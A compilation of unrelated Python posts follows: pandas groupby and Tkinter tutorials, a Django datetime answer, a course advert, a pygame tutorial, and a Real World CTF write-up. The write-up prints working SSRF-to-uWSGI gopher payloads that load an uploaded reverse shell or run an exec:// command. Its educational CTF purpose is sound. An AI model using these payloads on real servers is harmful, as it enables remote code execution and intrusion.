# Getting all public methods of the groupby object:
meth = [method_name for method_name in dir(df_rank)
        if callable(getattr(df_rank, method_name)) and not method_name.startswith('_')]

# Printing the result
print(IPython.utils.text.columnize(meth))

Note that in the code example above we also import IPython to print the list in columns. In the following examples we are going to use some of these methods. First, we can print out the groups by using the groups attribute to get a dictionary of groups:

df_rank.groups

We can also use the groupby method get_group to filter the grouped data. In the next code example we are going to select the Assistant Professor group (i.e., “AsstProf”).

# Get group df_rank.get_group('AsstProf').head()
Pandas Groupby Count

If we want to find out how big each group is (e.g., how many observations are in each group), we can use .size() to count the number of rows in each group:

df_rank.size()

# Output:
#
# rank
# AssocProf     64
# AsstProf      67
# Prof         266
# dtype: int64
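If we also want each group's share of the total, here is a quick sketch building on the size counts:

# Percentage of observations in each group
(df_rank.size() / df_rank.size().sum() * 100).round(1)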

Additionally, we can also use Pandas groupby count method to count by group(s) and get the entire dataframe. If we don’t have any missing values the number should be the same for each column and group. Thus, this is a way we can explore the dataset and see if there are any missing values in any column.

df_rank.count()

That was how to use Pandas size to count the number of rows in each group. We will return to this later, when we are grouping by multiple columns. In some cases we may want to find out the number of unique values in each group. This can be done using the groupby method nunique:

df_rank.nunique()

As can be seen in the last column (salary), there are 63 unique salaries among Associate Professors, 53 among Assistant Professors, and 261 among Professors in the dataset. In this example we have a complete dataset, and we can see that some individuals share the same salary (e.g., there are 261 unique values in the column salary for the 266 Professors). As we will see, if we have missing values in the dataframe we get a different result. In the next example we use the Pandas mask method together with NumPy's random.random to insert missing values (i.e., np.NaN) in roughly 10% of the dataframe:

import numpy as np

df_null = df.mask(np.random.random(df.shape) < .1)
df_null.isnull().sum().reset_index(name='N Missing Values')

Note, we used the reset_index method above to turn the counts back into a single-indexed dataframe. In this particular example we used the parameter name to name the count column ("N Missing Values"). This parameter can only be used on Pandas Series objects, not on dataframe objects.

That said, let’s return to the example; if we run the same code as above (counting unique values by group) we can see that it will not count missing values:

df_null.groupby('rank').nunique()

That is, we don’t get the same numbers in the two tables because of the missing values. In the following examples we are going to work with Pandas groupby to calculate the mean, median, and standard deviation by one group.

Pandas Groupby Mean

If we want to calculate the mean salary grouped by one column (rank, in this case) it’s simple. We just use Pandas mean method on the grouped dataframe:

df_rank['salary'].mean().reset_index()

Having a column simply named salary may not be informative. For instance, if someone else is going to look at the table, they may not know that it shows the mean salary for each group. Luckily, we can chain the rename method onto the code above to rename the columns of the grouped data:

df_rank['salary'].mean().reset_index().rename(
    columns={'rank': 'Rank', 'salary': 'Mean Salary'})
Median Score of a Group Using the groupby Method in Pandas

Now let's find the median salary by rank in the next Pandas groupby example:

df.groupby('rank')['salary'].median().reset_index().rename(
    columns={'rank': 'Rank', 'salary': 'Median Salary'})
Aggregate Data by Group Using Pandas Groupby

Most of the time we wan…
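A typical aggregation over grouped data might look like the following sketch (using the same Salaries columns as above):

# Several summary statistics per group in one call
df.groupby('rank')['salary'].agg(['mean', 'median', 'std', 'count'])

# Grouping by multiple columns works the same way
df.groupby(['rank', 'discipline'])['salary'].mean().reset_index()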

Get a date from a Django DateTimeField


I would like to request some assistance regarding this matter.

I am learning Django and trying out some code, but I hit a brick wall trying to get only the date from a model's DateTimeField.

here's the code that I am working on:

class APPLICANT_DATA(models.Model):
    SCHEDULED_AT = models.DateTimeField(null=True, blank=True)

def somefunction():
    app_data = APPLICANT_DATA.objects.all()
    for item in app_data:
        the_date = str(item.SCHEDULED_AT.strftime("%B-%d-%Y")) + ", " + the_date

And I am getting 'NoneType' object has no attribute 'strftime', even though my model contains 3 records that all have a date and time.

What am I doing wrong? Any advice for a newbie? Many thanks.

DateTimeField becomes a datetime.datetime object in Python

If you need a date object to manipulate later on, you could pull the datetime.date object directly from your DateTimeField() , using datetime.datetime.date() like below:

class ApplicantData(models.Model):
    scheduled_at = models.DateTimeField(null=True, blank=True)

# given an ApplicantData instance called application_data:
date = application_data.scheduled_at.date()

This works because Django will translate the DateTimeField into the Python type datetime.datetime , upon which we have called date() .

Format the datetime.date like you wish

Then from that, you get a datetime.date object, which you can format however you wish using datetime.date.strftime().
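For example, a small sketch assuming scheduled_at is populated:

d = application_data.scheduled_at.date()  # a datetime.date
formatted = d.strftime("%B-%d-%Y")        # e.g. 'December-03-2018'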

If you don't need a date object, you can also call strftime on your datetime.datetime object directly; no problem with that. Except that your object had a None field.

Dealing with NULL / None fields

If you want to allow for NULL values in scheduled_at you can do:

if application_data.scheduled_at is not None:
    date = application_data.scheduled_at.date()

Dataquest: An Intro to Deep Learning in Python


Deep learning is a type of machine learning that’s growing at an almost frightening pace. Nearly every projection has the deep learning industry expanding massively over the next decade. This market research report , for example, expects deep learning to grow 71x in the US and more than that globally over the next ten years. There’s never been a better time than now to get started.

To make that start easier for you, we’ve just launched a new course: Deep Learning Fundamentals .



This course is designed to give you an introduction to neural networks and deep learning. You'll start with the theory behind these concepts and get familiar with representing linear and logistic regression models as graphs. Then you'll start digging deeper into topics like nonlinear activation functions and work on improving your models by adding hidden layers of neurons, using the scikit-learn package in Python. Finally, you'll build a deep learning model that's capable of looking at images of handwritten numbers and identifying/classifying them correctly.

Why you should dive into deep learning

Boost your earnings

Although salaries for general data scientists are already excellent, as specialists, machine learning and deep learning engineers can command even higher rates. According to Indeed.com data from the US, for example, machine learning engineer salaries average around 13% higher than data scientist salaries.

Having some deep learning skills can also help your resume stand out from the herd when it comes to applying for data science jobs, even if you haven’t yet reached the level of deep learning specialist.

Demand for deep learning is growing

There's no doubt that machine learning is a fast-growing field, and within it, deep learning is also growing at a breakneck pace. Specific market projections vary from firm to firm, but everybody agrees on the general trend: demand for deep learning is headed through the roof.

It saves time

If you’ve messed with other forms of machine learning, you know that feature engineering - converting your input’s parameters into “features” your algorithm can read - can be a fairly difficult and time-intensive process. But the neural networks used in deep learning are designed to do that conversion automatically. So, for example, instead of having to figure out how to pull color data, histograms, and other metrics from a set of images, you can just run the raw images through your neural network and it will do the work for you!

That’s making it sound easy, of course, and it isn’t; the challenge is getting the network to the point where it’s capable of doing that work for you. But that means you’ll spend more time working with your algorithms and less time fiddling with features.

Specialize while staying flexible

Building a specialty can help you find work in any field, but it can also put you into a position where you’re doomed to be doing the same thing every day because your speciality is only appealing to a limited number of companies who are all doing the same sort of thing. Thankfully, that’s not the case with deep learning, which is in demand across a wide swath of industries and is being put to use to solve problems ranging from image recognition to translation to robotics.

It’s fun!

Career advantages aside, let’s not forget that deep learning is just plain cool. You can use it to get machines to do everything, from automatically colorizing old photos to destroying the world’s greatest chess players without actually teaching them how to do those things.

Ready to dive into the deep? The first mission of the new course is completely free so everybody can try it out, but you will need a Premium subscription to complete the course.

Creating Your First Tkinter GUI | 州的先生 Tkinter Tutorial (1)


Table of Contents

1. Why use Tkinter instead of PyQt
2. Creating a basic Tkinter program

1. Why Use Tkinter Instead of PyQt

As everyone knows, there are many options for creating GUI programs in Python, and the PyQt and wxPython packages are both very popular. These third-party GUI modules are powerful, richly configurable, and good-looking, and many people pick them.

州的先生 also often uses PyQt5 to give Python programs a GUI, which makes them easier to use, and has written a short PyQt5 primer, 《州的先生PyQt5入门教程》; readers interested in PyQt5 may want to read it.

Today, however, we introduce Python's built-in GUI module: tkinter.

Online you can find plenty of complaints about Tkinter: ugly widgets, inflexible, poor extensibility, few add-on modules, and so on. Admittedly Tkinter does have these shortcomings, but it is far from useless.

Tkinter's biggest advantage is that it is a built-in Python module, and that fact alone brings many benefits. Being built in, it requires no extra installation, so newcomers can simply import it and get going, instead of fighting pip installation failures or hunting everywhere for a compatible installer (PyQt5 has plenty of such cases).

Being a built-in module also means that when a program is packaged into an EXE or another executable, the resulting file is not especially large, which is very useful when distributing your program.

Think about it: you write a simple little tool and the packaged file turns out to be tens of megabytes in size; quite awkward.

With all that said, let's now formally start learning to write Python GUI programs with Tkinter.

2. Creating a Basic Tkinter Program

Importing the Tkinter module

Importing the Tkinter module is simple; just use:

import tkinter

That's all it takes.

By convention the module name is shortened to tk, so the usual import is:

import tkinter as tk

Instantiating the Tk class

Every GUI has a top-level container. In PyQt5 there are MainWindow, Widget, and so on; in Tkinter the most common and most basic one is the Tk() class. When a program grows large or has many windows, container widgets such as Frame or Toplevel are more convenient, but since we are only just starting with Tkinter, we will use Tk() as the top-level container of our GUI:

import tkinter as tk

root = tk.Tk()  # instantiate a Tk() main window

Setting the window title

Having instantiated a Tk() class and assigned it to the variable root, we now have a Tk window. Next we set the window's title with its title() method:

import tkinter as tk

root = tk.Tk()
root.title("第一个Tkinter程序")

This sets the window title to "第一个Tkinter程序" ("My first Tkinter program").

Running the GUI window

Having created a basic window, how do we get this GUI window running? In PyQt5 we can use the window's show() method to start the window's main loop; in Tkinter we use the window's mainloop() method to start the main event loop and bring the GUI window to life:

import tkinter as tk

root = tk.Tk()
root.title("第一个Tkinter程序")
root.mainloop()

Now the window we created appears when the Python file is run. The effect is shown below:


Creating a button

Above we created a GUI with nothing but a window; now let's add some widgets to it, such as a button. In Tkinter a button is the tk.Button() class, and by instantiating this class we create a button widget:

import tkinter as tk                    # import the tkinter module

root = tk.Tk()                          # instantiate a Tk() class
btn = tk.Button(root, text='点我吧')    # instantiate a Button whose parent is root
btn.pack(padx=200, pady=50)             # lay out the button; the padding sizes the window
root.title('第一个Tkinter程序')          # set the window title
root.mainloop()

Here we instantiate a Button() whose parent is root and set the button's text, then lay it out via its pack() method. Running the program again, we get the GUI shown below:


Binding a command to the button

The GUI above contains a window and a button, but what use is a button that just sits there? We can bind it to a function to respond to click events. In PyQt5 this is the important concept of signals and slots; Tkinter has a similar notion, which we will get to step by step in later articles.

First we create a simple function that prints a string to the console:

def tell_you():
    print("州的先生Tkinter教程")

Then we attach a command to the button through its config() method:

import tkinter as tk                    # import the tkinter module

def tell_you():
    print("州的先生Tkinter教程")

root = tk.Tk()                          # instantiate a Tk() class
btn = tk.Button(root, text='点我吧')    # instantiate a Button whose parent is root
btn.config(command=tell_you)            # bind the function as the button's command
btn.pack(padx=200, pady=50)             # lay out the button
root.title('第一个Tkinter程序')          # set the window title
root.mainloop()
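Equivalently, the command can be passed directly when the button is constructed; a one-line variant:

btn = tk.Button(root, text='点我吧', command=tell_you)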

Now, when we click the button, the program calls the tell_you() function and prints the string "州的先生Tkinter教程" to the console, as shown below:


3. Modularizing the Tkinter Program

In the program above every variable is global, from the root window down to the button widget. That may be fine while the program is small, but as we add more and more widgets it becomes hard to maintain. So we can reorganize our GUI program in an object-oriented way, using classes and objects as the organizational unit of the GUI window.

import tkinter as tk

class MainWindows(tk.Tk):

    def __init__(self):
        super().__init__()  # initialize the base class
        self.title("第一个程序")
        self.ini_ui()

    def ini_ui(self):
        self.btn = tk.Button(self, text='点我吧')
        self.btn.pack(padx=200, pady=30)
        self.btn.config(command=self.tell_you)

    def tell_you(self):
        print("州的先生Tkinter教程")

if __name__ == '__main__':
    app = MainWindows()
    app.mainloop()

Now every variable is confined to MainWindows(); with that, we have refactored our first Tkinter GUI program into object-oriented style. Running the code gives the same GUI program as before:



Real World CTF Magic Tunnel Write Up


I didn't look at this challenge during the competition. Near the end a teammate spotted the key idea, but we struggled to set up the environment locally and ran out of time, so we gave up.

Back to the point.

Opening the challenge, we find a Download feature. A quick test, for example: http://www.venenof.com/1.gif



The feature does not restrict the file extension at all, which means we can download arbitrary remote files.

Via the file:// protocol we can also read arbitrary local files; file:///proc/mounts reveals the web directory:



From there we can read the relevant files under the web directory.

The content of rwctf/settings.py is as follows:

""" Django settings for rwctf project. Generated by 'django-admin startproject' using Django 2.1.3. For more information on this file, see https://docs.djangoproject.com/en/2.1/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/2.1/ref/settings/ """ import os import dj_database_url # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = os.environ.get('SECRET_KEY', 'y5fc9nypwm%x1w^plkld4y#jwgrd)$ys6&!cog^!3=xr5m4#&-') # SECURITY WARNING: don't run with debug turned on in production! DEBUG = os.environ.get('DEBUG', '0') in ('True', 'true', '1', 'TRUE') ALLOWED_HOSTS = ['*'] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'xremote', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'rwctf.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.template.context_processors.media', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'rwctf.wsgi.application' # Database # https://docs.djangoproject.com/en/2.1/ref/settings/#databases DATABASES = { 'default': dj_database_url.config(conn_max_age=600, default='sqlite:////tmp/db.sqlite3') } # Password validation # https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/2.1/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, javascript, Images) # https://docs.djangoproject.com/en/2.1/howto/static-files/ STATIC_URL = '/static/' STATIC_ROOT = os.path.join(BASE_DIR, 'static') MEDIA_URL = '/media/' MEDIA_ROOT = os.path.join(BASE_DIR, 'media') LOG_PATH = os.environ.get('LOG_PATH', os.path.join(BASE_DIR, 'error.log')) LOGGING = { 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'standard': { 'format': '[%(asctime)s] - [%(levelname)s] - [%(pathname)s:%(lineno)d] - %(message)s', 'datefmt': '%Y-%m-%d %H:%M:%S' }, }, 'handlers': { 'console': { 'level': 'WARNING', 'class': 'logging.StreamHandler', 'formatter': 'standard', 'filters': ['discard_not_found_error'], } }, 'loggers': { '': { 'handlers': ['console'], 'level': 'WARNING' }, 
'django': { 'handlers': ['console'], 'level': 'WARNING' }, }, 'filters': { 'discard_not_found_error': { '()': 'django.utils.log.CallbackFilter', 'callback': lambda record: hasattr(record, 'status_code') and record.status_code != 404, } }, }

Reading urls.py:

from django.contrib import admin
from django.urls import path, include

urlpatterns = [
    path('', include('xremote.urls', namespace='xremote')),
    path('admin/', admin.site.urls),
]

Finally, reading xremote/views.py:

import os
import pycurl
import uuid

from django.utils import dateformat, timezone
from django.shortcuts import render
from django.views import generic
from django.db import transaction
from django.urls import reverse_lazy
from django.conf import settings
from django.http import HttpResponseRedirect

from . import forms
from . import models


class ImgsMixin(object):
    def get_context_data(self, **kwargs):
        kwargs['imgs'] = self.request.session.get('imgs', [])
        return super().get_context_data(**kwargs)


class DownloadRemote(ImgsMixin, generic.FormView):
    form_class = forms.ImageForm
    template_name = 'index.html'
    success_url = reverse_lazy('xremote:download')

    def download(self, url):
        try:
            c = pycurl.Curl()
            c.setopt(pycurl.URL, url)
            c.setopt(pycurl.TIMEOUT, 10)
            response = c.perform_rb()
            c.close()
        except pycurl.error:
            response = b''
        return response

    def generate_path(self):
        path = os.path.join(settings.MEDIA_ROOT, dateformat.format(timezone.now(), 'Y/m/d'))
        if not os.path.exists(path):
            os.makedirs(path, 0o755)
        return os.path.join(path, str(uuid.uuid4()))

    @transaction.atomic
    def form_valid(self, form):
        url = form.cleaned_data['url']
        response = self.download(url)
        path = self.generate_path()
        if response:
            with open(path, 'wb') as f:
                f.write(response)
            url = path[len(settings.MEDIA_ROOT)+1:]
            models.Image.objects.create(path=url)
            if 'imgs' not in self.request.session:
                self.request.session['imgs'] = []
            self.request.session['imgs'].append(url)
            self.request.session.modified = True
        return HttpResponseRedirect(self.get_success_url())

Here we notice that the app is deployed with uwsgi, and server.sh shows how it is started:

#!/bin/sh
BASE_DIR=$(pwd)
./manage.py collectstatic --no-input
./manage.py migrate --no-input
exec uwsgi --socket 0.0.0.0:8000 --module rwctf.wsgi --chdir ${BASE_DIR} \
    --uid nobody --gid nogroup \
    --cheaper-algo spare --cheaper 2 --cheaper-initial 4 --workers 10 --cheaper-step 1

uWSGI supports magic variables such as UWSGI_FILE, which loads the specified file as a new dynamic application. If that file is under our control, we have an RCE vulnerability.

Back to the beginning: we already know the site lets us download arbitrary files. So I tested locally, building the environment by following the reference article; since the magic variable automatically loads and executes the file, execution succeeds:



Capture the traffic locally:

tcpdump -i lo port 8001 -w dump.pcap

Or just listen with nc directly.

As noted above, the download feature is really an SSRF, so we can use gopher:// to reach the internal uwsgi on port 8000 and make it dynamically execute our own script. Local test:



So, back on the challenge: first remote-download a Python reverse shell through the feature and note the stored filename, for example /usr/src/rwctf/media/2018/12/03/0c0eb4ee-115e-48b5-8fda-c18d81d1ceef, then change the gopher payload to:

gopher://127.0.0.1:8000/_%00u%01%00%0C%00QUERY_STRING%00%00%0E%00REQUEST_METHOD%03%00GET%0C%00CONTENT_TYPE%00%00%0E%00CONTENT_LENGTH%00%00%0B%00REQUEST_URI%01%00%2F%09%00PATH_INFO%01%00%2F%0D%00DOCUMENT_ROOT%15%00%2Fusr%2Fshare%2Fnginx%2Fhtml%0F%00SERVER_PROTOCOL%08%00HTTP%2F1.1%0C%00UWSGI_SCHEME%04%00http%0B%00REMOTE_ADDR%09%00127.0.0.1%0B%00REMOTE_PORT%05%0035776%0B%00SERVER_PORT%04%008000%0B%00SERVER_NAME%0B%00example.com%0A%00UWSGI_FILE%09%00%2Fusr%2Fsrc%2Frwctf%2Fmedia%2F2018%2F12%2F03%2F0c0eb4ee-115e-48b5-8fda-c18d81d1ceef%09%00HTTP_HOST%0E%00localhost%3A8000%0F%00HTTP_USER_AGENT%0B%00curl%2F7.55.1%0B%00HTTP_ACCEPT%03%00%2A%2F%2A

But note the form definition:

from django import forms
from . import models

class ImageForm(forms.Form):
    url = forms.CharField(max_length=512, widget=forms.URLInput())

The url field is capped at 512 characters, and the payload above is definitely longer, so we have to trim it ourselves. After much trial and error I found that the ASCII value of the second byte of the packet is the length of the whole packet body, so I rebuilt the payload locally as follows:
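For context, a uwsgi packet starts with a 4-byte header: modifier1, a little-endian 16-bit datasize, and modifier2, which is why that "second character" encodes the body length. A small illustrative sketch of building such a packet (a hypothetical helper, not the script used in this write-up):

import struct

def uwsgi_packet(env):
    # Body: <u16le keylen><key><u16le vallen><val> for every variable
    body = b''
    for k, v in env.items():
        kb, vb = k.encode(), v.encode()
        body += struct.pack('<H', len(kb)) + kb
        body += struct.pack('<H', len(vb)) + vb
    # Header: modifier1 = 0, little-endian datasize, modifier2 = 0
    return struct.pack('<BHB', 0, len(body), 0) + body

pkt = uwsgi_packet({'REQUEST_METHOD': 'GET', 'UWSGI_FILE': '/tmp/shell.py'})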

<?php
echo urlencode(chr(strlen(urldecode('%0C%00QUERY_STRING%00%00%0E%00REQUEST_METHOD%03%00GET%0C%00CONTENT_TYPE%00%00%0E%00CONTENT_LENGTH%00%00%0B%00UWSGI_FILED%00/usr/src/rwctf/media/2018/12/03/0c0eb4ee-115e-48b5-8fda-c18d81d1ceef%09%00HTTP_HOST%0E%00localhost%3A8000%0F%00HTTP_USER_AGENT%0B%00curl/7.55.1%0B%00HTTP_ACCEPT%03%00%2A/%2A'))));
?>

gopher://127.0.0.1:8000/_%00%E4%00%00%0C%00QUERY_STRING%00%00%0E%00REQUEST_METHOD%03%00GET%0C%00CONTENT_TYPE%00%00%0E%00CONTENT_LENGTH%00%00%0A%00UWSGI_FILED%00/usr/src/rwctf/media/2018/12/03/0c0eb4ee-115e-48b5-8fda-c18d81d1ceef%09%00HTTP_HOST%0E%00localhost%3A8000%0F%00HTTP_USER_AGENT%0B%00curl/7.55.1%0B%00HTTP_ACCEPT%03%00%2A/%2A

This worked locally, but not against the challenge, so I guessed the remote environment was configured differently. Digging through the documentation I found the UWSGI_APPID magic variable. Its purpose is to bypass SCRIPT_NAME and VirtualHosting, so the user can pick the mount point without restriction; if the app id is not found in uWSGI's internal list of applications, the given file is loaded. So it can be configured like this:

server {
    server_name server001;

    location / {
        include uwsgi_params;
        uwsgi_param UWSGI_APPID myfunnyapp;
        uwsgi_param UWSGI_FILE /var/www/app1.py;
    }
}

A local capture looks like this:

%00%C6%01%00%0C%00QUERY_STRING%00%00%0E%00REQUEST_METHOD%03%00GET%0C%00CONTENT_TYPE%00%00%0E%00CONTENT_LENGTH%00%00%0B%00REQUEST_URI%01%00%2F%09%00PATH_INFO%01%00%2F%0D%00DOCUMENT_ROOT%15%00%2Fusr%2Fshare%2Fnginx%2Fhtml%0F%00SERVER_PROTOCOL%08%00HTTP%2F1.1%0C%00UWSGI_SCHEME%04%00http%0B%00REMOTE_ADDR%09%00127.0.0.1%0B%00REMOTE_PORT%05%0036452%0B%00SERVER_PORT%04%008000%0B%00SERVER_NAME%0B%00example.com%0B%00UWSGI_APPID%07%00testxdd%0A%00UWSGI_FILED%00%2Fusr%2Fsrc%2Frwctf%2Fmedia%2F2018%2F12%2F03%2F0c0eb4ee-115e-48b5-8fda-c18d81d1ceef%09%00HTTP_HOST%0E%00localhost%3A8000%0F%00HTTP_USER_AGENT%0B%00curl%2F7.55.1%0B%00HTTP_ACCEPT%03%00%2A%2F%2A

And modify the payload as follows:

gopher://127.0.0.1:8000/_%00%FA%00%00%0C%00QUERY_STRING%00%00%0E%00REQUEST_METHOD%03%00GET%0C%00CONTENT_TYPE%00%00%0E%00CONTENT_LENGTH%00%00%0B%00UWSGI_APPID%07%00testxdd%0A%00UWSGI_FILED%00/usr/src/rwctf/media/2018/12/04/7683a121-2d76-4a03-b35c-532bbe7f1483%09%00HTTP_HOST%0E%00localhost%3A8000%0F%00HTTP_USER_AGENT%0B%00curl/7.55.1%0B%00HTTP_ACCEPT%03%00%2A/%2A

Then just catch the reverse shell :-D



After the competition I found that an exploitation technique had already been published as early as January; because uWSGI's default schemes include exec, you can actually get RCE directly. The author also provides a script, so you don't even need a local environment and can capture the raw packet directly, for example:

%00%DF%00%00%0E%00REQUEST_METHOD%03%00GET%09%00HTTP_HOST%09%00127.0.0.1%09%00PATH_INFO%08%00%2Ftestapp%0B%00SERVER_NAME%09%00127.0.0.1%0F%00SERVER_PROTOCOL%08%00HTTP%2F1.1%0C%00QUERY_STRING%00%00%0B%00SCRIPT_NAME%08%00%2Ftestapp%0A%00UWSGI_FILE%20%00exec%3A%2F%2Ftouch%20%2Ftmp%2Fccc%3B%20echo%20test%0B%00REQUEST_URI%08%00%2Ftestapp

Thanks to ph师傅 for the Docker image. I ran into quite a few problems while reproducing this; it really is "real world".

gamingdirectional: Create the third level for this pygame project


In this article we are going to create the third level for our pygame project, after having created the previous two levels. The reason I create the third game level in this chapter is that this level is different from the second level, which only uses the same enemy class to generate a different type of enemy ship. In this chapter we are going to create a new enemy class which acts differently from the previous enemy class.

We will create a new enemy object which moves from side to side and shoots three missiles at the same time. We can add more features to this new enemy class later on, but for now let's just create a simple one first.

from pygame import math as mt
from Objectpool import Objectpool

class Enemy1(object):

    def __init__(self, enemy_surface, x, y):
        self.on = True
        self.enemy_surface = enemy_surface
        self.x = x
        self.y = y
        self.hit = False
        self.direction = True
        self.enemy_pos = mt.Vector2(self.x, self.y)
        self.missile_count = 10
        self.missile_timer = 0
        self.missile_object_pool = Objectpool(self.missile_count)
        self.missile_list = []

    def update(self):
        if self.direction:  # move from side to side
            self.x += 0.1
        else:
            self.x -= 0.1
        self.enemy_pos = mt.Vector2(self.x, self.y)
        self.missile_update(self.missile_object_pool)

    def missile_update(self, pool):
        for item in list(self.missile_list):
            if not item.on:
                self.missile_list.remove(item)
                pool.recycle(item)
            else:
                item.update()

    def missile_draw(self, scene):  # draw enemy missiles on the game scene
        for item in list(self.missile_list):
            scene.blit(item.missile_surface, item.missile_pos)

    def create_enemy_missile(self, enemy_missile_manager):
        if self.missile_timer > 300:  # fire three missiles at once, then reset the timer
            self.missile_timer = 0
            if self.missile_object_pool.getSize() > 0:
                enemy_missile_manager.create_missile(self.x + 3, self.y + 100, self.missile_object_pool, self.missile_list)
                enemy_missile_manager.create_missile(self.x + 50, self.y + 100, self.missile_object_pool, self.missile_list)
                enemy_missile_manager.create_missile(self.x + 100, self.y + 100, self.missile_object_pool, self.missile_list)
            else:
                enemy_missile_manager.create_missile(self.x + 3, self.y + 100, None, self.missile_list)
                enemy_missile_manager.create_missile(self.x + 50, self.y + 100, None, self.missile_list)
                enemy_missile_manager.create_missile(self.x + 100, self.y + 100, None, self.missile_list)
        else:
            self.missile_timer += 1

Next, we edit the enemy manager class, adding in the level-three scene's objects.

from Enemy import Enemy
from GameSprite import GameSprite
from pygame.locals import *
from EnemyMissileManager import EnemyMissileManager
import random
from Objectpool import Objectpool
from Enemy1 import Enemy1

class EnemyManager(object):

    def __init__(self, scene, player, game_level):
        self.enemy_missile_manager = EnemyMissileManager()
        self.scene = scene
        self.player = player
        self.enemy_count = 10
        self.horizontal_enemy_count = 1
        self.missile_count = 60
        self.enemy_list = []
        self.horizontal_enemy_list = []
        self.image = 'Asset/enemy0.png'
        self.image1 = 'Asset/enemy1.png'
        self.image2 = 'Asset/enemy2.png'
        self.width = 30
        self.height = 30
        self.width1 = 130
        self.height1 = 130
        self.rect = Rect(0, 0, self.width, self.height)
        self.rect1 = Rect(0, 0, self.width1, self.height1)
        self.more_enemy = 0
        self.y = -50
        self.boundary_width = 660
        self.boundary_height = 660
        self.object_pool = Objectpool(self.enemy_count)
        self.horizontal_object_pool = Objectpool(self.horizontal_enemy_count)
        self.next_enemy = 0
        self.level = game_level
        # initialize game sprite objects
        self.sprite = GameSprite(self.image, self.rect)
        self.sprite1 = GameSprite(self.image1, self.rect)
        self.sprite2 = GameSprite(self.image2, self.rect1)

    def create_enemy(self, x, y):
        if self.enemy_count > 0:
            if self.object_pool.getSize() > 0:  # take a ship from the object pool if it is not empty
                self.enemy_list.append(self.object_pool.obtain())
            else:  # object setup based on the level of the game
                if self.level == 1:
                    self.enemy_surface = self.sprite.getImage()
                elif self.level == 2 or self.level == 3:
                    if self.next_enemy == 0:
                        self.enemy_surface = self.sprite.getImage()
                        self.next_enemy += 1
                    elif self.next_enemy == 1:
                        self.enemy_surface = self.sprite1.getImage()
                        self.next_enemy = 0
                self.enemy_list.append(Enemy(self.enemy_surface, x, y))
            self.enemy_count -= 1

    def create_horizontal_enemy(self, x, y):
        if self.horizontal_enemy_count > 0:
            if self.horizontal_object_pool.getSize() > 0:  # take a ship from the object pool if it is not empty
                self.horizontal_enemy_list.append(self.horizontal_object_pool.obtain())
            else:  # object setup based on the level of the game
                if self.level == 3:
                    self.enemy_surface1 = self.sprite2.getImage()
                    self.horizontal_enemy_list.append(Enemy1(self.enemy_surface1, x, y))
            self.horizontal_enemy_count -= 1

    def update(self):
        if self.level == 1 or self.level == 2:
            if self.more_enemy > 600:
                self.more_enemy = 0
                x = random.randint(30, self.boundary_width - 50)
                self.create_enemy(x, self.y)  # create more enemies
            else:
                self.more_enemy += 1  # increase the timer
        elif self.level == 3:
            if self.more_enemy > 600:
                self.more_enemy = 0
                x = random.randint(30, self.boundary_width - 50)
                self.create_enemy(x, self.y)  # create more enemies
            else:
                self.more_enemy += 1  # increase the timer
            if self.horizontal_enemy_count > 0:
                self.create_horizontal_enemy(-130, 200)  # create the new horizontal enemy
        self.enemy_update()
        self.check_boundary()
        self.create_enemy_missile()

    def create_enemy_missile(self):
        for item in list(self.enemy_list):
            if self.player.pos.y - item.y < 100 and abs(self.player.pos.x - item.x) < 60:
                item.create_enemy_missile(self.enemy_missile_manager)
        if self.level == 3:
            for item in list(self.horizontal_enemy_list):
                item.create_enemy_missile(self.enemy_missile_manager)

    def enemy_update(self):
        for item in list(self.enemy_list):
            if not item.on:
                self.enemy_list.remove(item)
                self.enemy_count += 1
                item.y = self.y
                item.on = True
                self.object_pool.recycle(item)
            else:
                item.update()
        if self.level == 3:
            for item in list(self.horizontal_enemy_list):
                if not item.on:
                    self.horizontal_enemy_list.remove(item)
                    self.horizontal_enemy_count += 1
                    item.y = 220
                    item.x = -130
                    item.on = True
                    self.horizontal_object_pool.recycle(item)
                else:
                    item.update()

    # check the boundary of the enemy ships against the game scene area
    def check_boundary(self):
        for i in range(len(self.enemy_list)):
            if self.enemy_list[i].y > self.boundary_height:
                self.enemy_list[i].on = False
        if self.level == 3:
            for i in range(len(self.horizontal_enemy_list)):
                if self.horizontal_enemy_list[i].x > self.boundary_width:
                    self.horizontal_enemy_list[i].direction = False
                elif self.horizontal_enemy_list[i].x <= -130:
                    self.horizontal_enemy_list[i].direction = True

    def draw(self):
        # blit the enemies and enemy missiles on the scene
        for i in range(len(self.enemy_list)):
            self.scene.blit(self.enemy_list[i].enemy_surface, self.enemy_list[i].enemy_pos)
            self.enemy_list[i].missile_draw(self.scene)
        if self.level == 3:
            for i in range(len(self.horizontal_enemy_list)):
                self.scene.blit(self.horizontal_enemy_list[i].enemy_surface, self.horizontal_enemy_list[i].enemy_pos)
                self.horizontal_enemy_list[i].missile_draw(self.scene)

